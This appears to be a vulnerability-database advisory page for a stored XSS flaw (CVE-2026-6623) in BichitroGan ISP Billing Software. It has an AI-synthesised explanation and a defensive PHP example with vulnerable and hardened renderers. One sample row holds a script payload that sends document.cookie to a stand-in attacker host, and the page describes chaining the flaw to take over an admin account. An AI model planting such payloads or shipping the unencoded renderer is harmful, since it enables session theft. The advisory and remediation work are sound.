VYPR
Low severity · score 2.4 (NVD) · Advisory · Published Apr 20, 2026 · Updated Apr 22, 2026

CVE-2026-6623

Description

A security flaw has been discovered in BichitroGan ISP Billing Software 2025.3.20. This impacts an unknown function of the file /?_route=settings/users-view/ of the component Profile Page Handler. Performing a manipulation results in cross site scripting. The attack is possible to be carried out remotely. The vendor was contacted early about this disclosure but did not respond in any way.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Stored XSS in BichitroGan ISP Billing Software 2025.3.20 via fullname field allows attackers to execute arbitrary JavaScript in admin sessions, potentially leading to full system compromise.

Vulnerability

Overview

CVE-2026-6623 is a stored cross-site scripting (XSS) vulnerability in BichitroGan ISP Billing Software version 2025.3.20. The flaw resides in the profile page handler: the fullname parameter submitted to /accounts/profile (edit-profile-post) is stored in the database and later rendered in /?_route=settings/users-view/{id} without output encoding, so a user can persist arbitrary HTML and JavaScript that runs in the browser of anyone who views that page [1].

Exploitation

An attacker must first authenticate as a normal user. Navigating to the profile edit page and setting the fullname field to a JavaScript payload stores that payload in the database. When any user, including an administrator, later views the affected profile page or the admin user list, the payload executes in their browser. No special network position is required beyond remote access to the application [1].

Impact

Successful exploitation enables session hijacking, credential theft, and unauthorized actions within the context of the victim's session. The reference notes that this XSS can be chained with an IDOR vulnerability (CVE-2026-5031) to force an admin to view the attacker's profile, leading to privilege escalation and potential full system compromise [1].

Mitigation

The vendor was contacted but did not respond, and no official patch has been released. Until one is, operators with access to the application source should encode the stored value at the point of output, for example htmlspecialchars($user['fullname'], ENT_QUOTES, 'UTF-8') in the profile view and the admin user list, and apply the same output encoding in every template that renders user-controlled data. Input validation that restricts special characters in fullname is a secondary, defence-in-depth measure: legitimate names contain apostrophes and non-ASCII letters, so rejecting those characters does not replace output encoding [1].
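As an added example (not BichitroGan's code; the page cites only the htmlspecialchars() workaround), assuming the application is PHP 8 and the profile view receives a $user row from the database, the vulnerable rendering and the hardened one side by side, plus a small audit helper a responder can run over existing rows to find payloads that were stored before the fix. The user rows, function names and the attacker.invalid host are constructed for the example.

```php
<?php
// Added example for CVE-2026-6623, not code from BichitroGan ISP Billing
// Software. Assumes (the page does not show the template) that the profile
// view is PHP 8 and receives a $user row loaded from the database.
declare(strict_types=1);

/**
 * Encode a value for use in an HTML text node or a quoted attribute value.
 * ENT_QUOTES encodes both " and ', so the same helper is safe in both
 * contexts; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
 */
function escapeHtml(?string $value): string
{
    return htmlspecialchars($value ?? '', ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable rendering (the behaviour the CVE describes): the stored value is
// concatenated straight into the markup, so the browser parses the attacker's
// tag and runs it in the viewer's session.
function renderProfileVulnerable(array $user): string
{
    return '<h2>' . $user['fullname'] . '</h2>'
         . '<input name="fullname" value="' . $user['fullname'] . '">';
}

// Hardened rendering: every dynamic value passes through escapeHtml(), so
// <, >, &, " and ' reach the browser as entities and are displayed, not parsed.
function renderProfileHardened(array $user): string
{
    return '<h2>' . escapeHtml($user['fullname']) . '</h2>'
         . '<input name="fullname" value="' . escapeHtml($user['fullname']) . '">';
}

/**
 * Audit helper for responders: return the ids of rows whose fullname contains
 * markup. Names legitimately contain apostrophes and accents, so this looks for
 * angle brackets and scheme prefixes rather than "special characters" generally.
 */
function findSuspiciousFullnames(array $rows): array
{
    $ids = [];
    foreach ($rows as $row) {
        $name = strtolower((string) ($row['fullname'] ?? ''));
        if (str_contains($name, '<') || str_contains($name, '>')
            || str_contains($name, 'javascript:') || str_contains($name, 'data:')) {
            $ids[] = $row['id'];
        }
    }
    return $ids;
}

// Constructed sample rows standing in for the users table; the second one
// holds the kind of value a low-privileged user can store via the edit form.
$rows = [
    ['id' => 7,  'fullname' => "Siobhán O'Brien"],
    ['id' => 42, 'fullname' => '<script>new Image().src="https://attacker.invalid/?c="+document.cookie</script>'],
];

foreach ($rows as $user) {
    echo 'vulnerable: ', renderProfileVulnerable($user), PHP_EOL;
    echo 'hardened:   ', renderProfileHardened($user), PHP_EOL;
}
// Only the second row is flagged; the apostrophe in O'Brien is harmless once encoded.
echo 'suspicious ids: ', implode(',', findSuspiciousFullnames($rows)), PHP_EOL;
```

The audit helper is deliberately narrow: the goal is to find rows worth inspecting, not to validate names, and output encoding remains the control that actually neutralises whatever is stored.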

References
  1. CVE-2026-6623

AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Patches (0)

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References (4)

News mentions (0)

No linked articles in our index yet.